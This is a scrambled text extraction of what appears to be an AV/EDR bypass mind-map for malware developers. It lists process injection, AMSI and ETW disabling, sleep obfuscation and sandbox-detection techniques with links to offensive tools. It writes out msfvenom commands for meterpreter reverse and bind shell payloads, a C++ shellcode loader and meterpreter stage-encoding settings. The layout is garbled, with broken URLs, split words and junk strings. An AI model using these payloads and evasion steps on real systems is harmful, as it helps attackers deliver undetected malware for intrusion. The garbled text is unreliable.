Professional Documents
Culture Documents
The Road
The Road
ttps://www.ired.team/offensive-security/
h
Signature hiding defense-evasion/av-bypass-with-metasploit- ttps://subscription.packtpub.com/book/
h
templates security/9781789610789/8/ch08lvl1sec50/
executing-the-inject-code-using-apc-queuing
ttps://improsec.com/tech-blog/bypassing-
h
ROP
control-flow-guard-on-windows-10-part-ii ttps://github.com/LloydLabs/
h
APC (Asyncronous Procedure Call)
ntqueueapcthreadex-ntdll-gadget-injection
ttps://joshpitts.medium.com/hooking-control-
h
flow-guard-cfg-for-fun-and-profit- ttps://decoded.avast.io/janvojtesek/raspberry-
h
31f951485545 robins-roshtyak-a-little-lesson-in-trickery/
CFG
ttps://citeseerx.ist.psu.edu/document?repid=
h
rep1&type=pdf&doi= ttps://www.ired.team/offensive-security/code-
h
ade1cc22ee994c1b353326ae4cedccd29f33b8d injection-process-injection/process-hollowing-
0 and-pe-image-relocations#relocation
Static Process hollowing
CFG flattening http://ac.inf.elte.hu/Vol_030_2009/003.pdf ttps://sevrosecurity.com/2020/04/08/
h
process-injection-part-1-createremotethread/
Pro tips : A shellcode sent in 3 open sources
ttps://learn.microsoft.com/en-us/dotnet/
h
packer will have more chance to be caught than
Change logo/icon csharp/language-reference/compiler-options/
a manual obfuscation ttps://attack.mitre.org/techniques/T1055/
h
resources?redirectedfrom=MSDN Thread execution hijacking
003/
fdsfsdfs https://github.com/TheD1rkMtr/D1rkLrd
ttps://rastamouse.me/memory-patching-amsi-
h
PSC (Ptrace System Calls)
bypass/
https://github.com/xuanxuan0/DripLoader ttps://thehackernews.com/2017/12/malware-
h
C++ Process Doppelganging
sec.co.uk/2018/06/exploring- process-doppelganging.html
https://github.com/Hagrid29/PELoaderBypass AMSI -and-logging-evasion/
ttps://disman.tl/2015/01/30/an-improved-
h
ttps://www.pentestpartners.com/security-
h Reflective dll injection
reflective-dll-injection-technique.html
blog/patchless-amsi-bypass-using-sharpblock/
python https://github.com/icyguider/Shhhloader https://github.com/fancycode/MemoryModule
Description
https://github.com/cribdragg3r/Alaris
C2 by DNS Dll injection https://www.ired.team/offensive-security/code-
injection-process-injection/dll-injection
C https://github.com/trustedsec/COFFLoader
Network P2P (hide ip from C2)
ttps://book.hacktricks.xyz/windows-
h
ttps://github.com/CMEPW/Selha/blob/main/
h DLL Sideloading & Proxying hardening/windows-av-bypass#dll-sideloading-
C/aes-loader-stageless.c HTTPS
and-proxying
ttps://medium.com/@merasor07/av-edr-
h
https://github.com/aeverj/NimShellCodeLoader evasion-using-direct-system-calls-user-mode- ou put your region in RW, you write your
Y
Nim vs-kernel-mode-fad2fdfed01a shellcode, then you reprotect in RX, then you
Direct syscalls RWX
ttps://github.com/sh3d0ww01f/nim_
h run the thread. This way your region is never in
shellloader https://thewover.github.io/Dynamic-Invoke/ rwx
ttps://www.purpl3f0xsecur1ty.tech/2021/03/
h
https://github.com/EddieIvan01/gld WaitForSingleObjectEx
30/av_evasion.html ttps://www.mdsec.co.uk/2022/04/process-
h
Go dynamic injection-via-component-object-model-com-
https://github.com/zha0gongz1/DesertFox Foliage irundowndocallback/
COM Hijack Dll
https://evasions.checkpoint.com/techniques/
Delayed execution https://0xpat.github.io/Abusing_COM_Objects/
small sleep obfuscation technique that uses
A timing.html#delayed-execution
https://github.com/b1tg/rs_shellcode Ekko
CreateTimerQueueTimer Win32 API Exe
ttps://github.com/S4ntiagoP/donut/tree/
h
Rust https://github.com/r4ime/shellcode_loader ttps://www.cyberbit.com/blog/endpoint-
h syscalls
ttps://github.com/janoglezcampos/
h
Remote thread security/malware-mitigation-when-direct-
dfsdfsf
https://github.com/cr7pt0pl4gu3/Pestilence
Deathsleep
DeathSleep
system-calls-are-used/
Hta
https://blog.securityevaluators.com/creating-
< ttps://github.com/hasherezade/pe_to_
h
C++ dsec.co.uk/2020/03/hiding-
av-resistant-malware-part-1-7604b83ea0c0 shellcode Cpl
Crystal
OH FFWKLFWFWFW User APC
ttps://www.cyberbit.com/endpoint-security/
h
malware-mitigation-when-direct-system-calls-
C https://github.com/reveng007/ReflectiveNtdll TheWover/DInvoke are-used/ https://github.com/monoxgas/sRDI Link
Bypass AV/EDR Dropper Manual loader Automatic loader Generate shellcode Manual obfuscation Automatic obfuscation Process injection Detect virtual machines (Sandbox) From PE to shellcode From alive beacon Extensions
include <iostream>
# sfvenom -p windows/x64/meterpreter/
m https://github.com/sevagas/macro_pack Count processus number if >=40 its probably not a VM Havoc dotnet (object file)
#include <Windows.h> reverse_tcp LHOST=<SERVER> LPORT=< Office macro
PORT> -f raw https://github.com/optiv/Ivy User interaction Send MessageBoxW
int main(void) { From .net to BoF https://github.com/CCob/BOF.NET
. 1 allocating memory
.2 moving shellcode into that memory HMODULE hMod = LoadLibrary("shellcode. sfvenom -p windows/meterpreter/reverse_
m https://github.com/phra/PEzor Software Check for internet Cobalt BoF (Beacon object file)
dll"); msfvenom tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt- ttps://github.com/trustedsec/CS-Situational-
h
.3 executing the shellcode C
if (hMod == nullptr) { key thisisakey -f dll Awareness-BOF
https://github.com/klezVirus/inceptor Datetime on compilation
cout << "Failed to load shellcode.dll" << endl;
} sfvenom -p windows/meterpreter/bind_tcp -e
m Packing https://github.com/govolution/avet Check for Computer name VM = DESKTOP-[0-9A-Z]{7}
x86/shikata_ga_nai '\x00' -i 30 RHOST=10.0.0.
return 0; 68 LPORT=9050 -f c | tr -d '"' | tr -d '\n' | more https://github.com/Nariod/RustPacker
} ttps://github.com/CMEPW/bof-collection/
h
CPUID timing
blob/main/src/checkVM/checkVM2.c
C2 (Cobalt/Havoc what ever) ttps://github.com/DavidBuchanan314/
h
@Jenaye_fr ttps://medium.com/securebit/bypassing-av-
h monomorph Hardware
ypical user workstation has a processor with
T
through-metasploit-loader-64-bit-
LeDocteurDesBits at least 2 cores, a minimum of 2 GB of RAM
9abe55e3e0c8 ttps://nytrosecurity.com/2019/06/30/writing-
h https://github.com/upx/upx
C++ ASM and a 100 GB hard drive
Crédits shellcodes-for-windows-x64/
michmich1000 ttps://github.com/ReversingID/Shellcode-
h https://github.com/EgeBalci/sgn/
Loader/tree/master/windows ttps://evasions.checkpoint.com/techniques/
h
@Zabannn ine hyperion.exe /root/payloads/shellter/
w OSX
Hyperion https://github.com/CCob/SharpBlock macos.html#macos-sandbox-methods
shellter_putty_reverse_x86.exe
ttps://sevrosecurity.com/2019/05/25/bypass-
h
.NET ttps://github.com/danielbohannon/Invoke-
h
windows-defender-with-a-simple-shell-loader/ Tools https://github.com/a0rtega/pafish
ttps://vxug.fakedoma.in/papers/VXUG/
h Obfuscation
Static AMSI Bypass
Exclusive/
C
FromaCprojectthroughassemblytoshellcodeHas https://github.com/klezVirus/Chameleon
herezade.pdf
taged and stageless
S https://github.com/tokyoneon/Chimera
By definition, when we talk about staged we are
referring to a payload in addition to a piece This careCrow -I /Path/To/ShellCode -d facebook.
S
https://github.com/optiv/ScareCrow
means that there will be several actions (often com
2) between the client and the server. Signature hiding
https://github.com/paranoidninja/CarbonCopy
If you use meterpreter, please use the following
commands ttps://gist.github.com/snovvcrash/
h
LOLBIN RemComSvc
123945e8f06c7182769846265637fedb
set EnableStageEncoding true;
set StageEncoder x64/xor_dynamic; Entropy https://github.com/kleiton0x00/Shelltropy
https://github.com/optiv/ScareCrow
ttps://gist.github.com/tandasat/
h
e595c77c52e13aaee60e1e8b65d2ba32
Disable ETW
https://github.com/Soledge/BlockEtw
https://github.com/CCob/SharpBlock
https://github.com/klezVirus/SysWhispers3
https://github.com/jthuraisamy/SysWhispers2
Disable AV https://github.com/APTortellini/unDefender